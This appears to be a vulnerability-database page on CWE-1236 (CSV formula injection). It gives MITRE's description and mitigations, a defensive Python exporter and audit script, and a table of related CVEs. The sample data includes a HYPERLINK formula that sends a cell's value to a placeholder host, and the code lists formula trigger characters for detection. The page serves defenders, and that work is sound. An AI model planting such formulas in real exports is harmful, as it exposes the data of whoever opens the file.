
CWE-1236 — Vulnerability Class 128

128 vulnerabilities classified as CWE-1236. AI Chinese analysis included.

CWE-1236 is an input validation weakness in which an application writes user-supplied data to a Comma-Separated Values (CSV) file without neutralizing it first. An attacker exploits it by placing formula elements, such as values starting with an equals sign or a plus sign, into data that will be exported. When a victim opens the resulting file in a spreadsheet application such as Microsoft Excel, the software interprets those leading characters as a formula rather than as plain text, which can lead to remote code execution, data exfiltration, or other unauthorized actions. To mitigate this risk, developers must neutralize the data during serialization, specifically by prefixing fields that begin with a dangerous character with a single quote or by escaping those characters. Ensuring that all user-generated content is treated strictly as data and never as executable instructions prevents formula injection and preserves the integrity of the data exchange.

MITRE CWE Description
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
Common Consequences (1)
Confidentiality: Read Application Data, Execute Unauthorized Code or Commands
Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
Mitigations (3)
Implementation: When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Effectiveness: Moderate
Implementation: If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Effectiveness: Moderate
Architecture and Design: Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
Effectiveness: Limited
Examples (1)
Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '='.
Attack (Other): =HYPERLINK(link_location, [friendly_name])
Good (Other): HYPERLINK(link_location, [friendly_name])
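Added example, written for this page and not taken from the CWE entry or from any product listed below: a Python exporter that applies the two Implementation mitigations above (prepend an apostrophe to fields that start with a formula character, and quote every field so a value cannot break out of its cell), plus an audit function that scans an existing CSV export for cells a spreadsheet would read as formulas. It goes slightly beyond the page's list of four trigger characters by also treating a leading tab or carriage return as risky, following OWASP's CSV injection guidance (an assumption beyond this page). The sample rows, including the HYPERLINK cell modelled on the CWE example, are constructed.

```python
import csv
import io

# The four characters named in the CWE-1236 mitigation text, plus tab and
# carriage return, which OWASP's CSV injection guidance also lists because
# some importers strip leading whitespace before deciding whether a field
# is a formula (assumption beyond the page).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would treat this cell text as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Apply the 'prepend a single apostrophe' mitigation to one field.

    Only strings are touched: an int or float cannot carry a formula, so it
    is passed through and will be written as a plain number.  Note the
    known trade-off: a *string* such as "-3" is also prefixed and therefore
    becomes text in the spreadsheet rather than a negative number.
    """
    if not isinstance(value, str):
        return value
    if is_formula_like(value):
        return "'" + value
    return value


def rows_to_csv(rows, neutralize=True):
    """Serialize rows to CSV text.

    csv.QUOTE_ALL wraps every field in double quotes and doubles embedded
    quotes, so a value containing a comma, quote or newline cannot start a
    new cell or row.  With neutralize=True each string field additionally
    goes through neutralize_cell(); neutralize=False reproduces the
    vulnerable 'before' behaviour for comparison.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        if neutralize:
            row = [neutralize_cell(v) for v in row]
        writer.writerow(row)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit an existing CSV export.

    Returns (row_index, column_index, value) for every cell that starts with
    a formula trigger, i.e. every cell that should have been neutralized.
    """
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample export.  Row 2's display name is an attacker-controlled
# value of the shape shown in the CWE example; row 3's starts with '+'.
SAMPLE_ROWS = [
    ["user_id", "display_name", "balance"],
    [1, "Alice", 10.5],
    [2, '=HYPERLINK("http://example.invalid/?x=A1", "click")', 250],
    [3, "+Bob", 0],
]

if __name__ == "__main__":
    print("unsafe export findings:",
          find_formula_cells(rows_to_csv(SAMPLE_ROWS, neutralize=False)))
    print(rows_to_csv(SAMPLE_ROWS))
    print("safe export findings:", find_formula_cells(rows_to_csv(SAMPLE_ROWS)))
```

Running the module prints two findings for the unneutralized export (the HYPERLINK cell and "+Bob") and none for the neutralized one. The audit function is the useful part for a defender reviewing exports from one of the products listed on this page: it does not need the generating code, only the file.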
CVE ID | Title | CVSS | Severity | Published
CVE-2025-7061 | Intelbras InControl operador csv injection — InControl | 2.7 | Low | 2025-07-04
CVE-2025-1421 | Formula injection in a CSV file in Proget MDM — Proget | 6.5 (AI) | Medium (AI) | 2025-05-21
CVE-2025-4546 | 1Panel-dev MaxKB Knowledge Base Module csv injection — MaxKB | 4.7 | Medium | 2025-05-11
CVE-2024-55532 | Apache Ranger: Improper Neutralization of Formula Elements in a CSV File — Apache Ranger | 9.8 | - | 2025-03-03
CVE-2025-1836 | Incorta Edit Insight csv injection — Incorta | 4.3 | Medium | 2025-03-02
CVE-2024-45084 | IBM Cognos Controller CSV injection — Cognos Controller | 8.0 | High | 2025-02-19
CVE-2024-47572 | Fortinet FortiSOAR security vulnerability — FortiSOAR | 8.3 | Critical | 2025-01-14
CVE-2024-22063 | ZTE ZENIC ONE R58 product has a CSV injection vulnerability — ZENIC ONE R58 | 7.6 | High | 2024-12-30
CVE-2024-9102 | phpLDAPadmin: Improper Neutralization of Formula Elements — phpLDAPadmin | 8.8 | - | 2024-12-19
CVE-2024-53260 | Course Roster vulnerable to CSV Injection in Autolab — Autolab | 6.8 | Medium | 2024-11-27
CVE-2021-38963 | IBM Aspera Console CSV injection — Aspera Console | 8.0 | High | 2024-09-24
CVE-2024-3232 | Formula Injection Vulnerability — Tenable Identity Exposure | 7.6 | High | 2024-07-16
CVE-2024-27785 | Fortinet FortiAIOps security vulnerability — FortiAIOps | 5.1 | Medium | 2024-07-09
CVE-2023-5527 | Business Directory Plugin <= 6.4.3 - Authenticated (Author+) CSV Injection — Business Directory Plugin – Easy Listing Directories for WordPress | 7.4 | High | 2024-06-18
CVE-2023-5424 | WS Form LITE <= 1.9.217 - Unauthenticated CSV Injection — WS Form LITE – Drag & Drop Contact Form Builder | 4.7 | Medium | 2024-06-07
CVE-2024-28764 | IBM WebSphere Automation CSV injection — WebSphere Automation | 6.5 | Medium | 2024-05-01
CVE-2023-48709 | iTop vulnerable to potential formula injection in Excel/CSV export file — iTop | 8.0 | High | 2024-04-15
CVE-2024-3214 | Relevanssi – A Better Search <= 4.22.1 - Unauthenticated Second Order CSV Injection — Relevanssi Premium | 5.8 | Medium | 2024-04-09
CVE-2024-25007 | Ericsson Network Manager - Improper Neutralization of Formula Elements Vulnerability — Ericsson Network Manager | 7.1 | High | 2024-04-04
CVE-2023-47534 | Fortinet FortiClientEMS security vulnerability — FortiClientEMS | 8.7 | Critical | 2024-03-12
CVE-2024-28111 | CSV Injection in exported history CSV files — canarytokens | 6.5 | Medium | 2024-03-06
CVE-2023-35899 | IBM Cloud Pak for Automation CSV injection — Cloud Pak for Automation | 7.0 | High | 2024-03-05
CVE-2023-45597 | AiLux imx6 security vulnerability — imx6 bundle | 5.9 | Medium | 2024-03-05
CVE-2023-42004 | IBM Security Guardium CSV injection — Security Guardium | 8.0 | High | 2023-11-28
CVE-2023-41798 | WordPress Directorist Plugin <= 7.7.1 is vulnerable to CSV Injection — Directorist – WordPress Business Directory Plugin with Classified Ads Listings | 5.1 | Medium | 2023-11-07
CVE-2022-41616 | WordPress Export Users Data CSV Plugin <= 2.1 is vulnerable to CSV Injection — Export Users Data CSV | 7.6 | High | 2023-11-07
CVE-2022-38702 | WordPress WP CSV Exporter Plugin <= 2.0 is vulnerable to CSV Injection — WP CSV Exporter | 5.8 | Medium | 2023-11-07
CVE-2022-42882 | WordPress Simple CSV/XLS Exporter Plugin <= 1.5.8 is vulnerable to CSV Injection — Simple CSV/XLS Exporter | 5.8 | Medium | 2023-11-07
CVE-2022-44738 | WordPress Posts and Users Stats Plugin <= 1.1.3 is vulnerable to CSV Injection — Posts and Users Stats | 5.8 | Medium | 2023-11-07
CVE-2022-45078 | WordPress User Blocker Plugin <= 1.5.5 is vulnerable to CSV Injection — User Blocker | 5.9 | Medium | 2023-11-07

Vulnerabilities classified as CWE-1236 represent 128 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.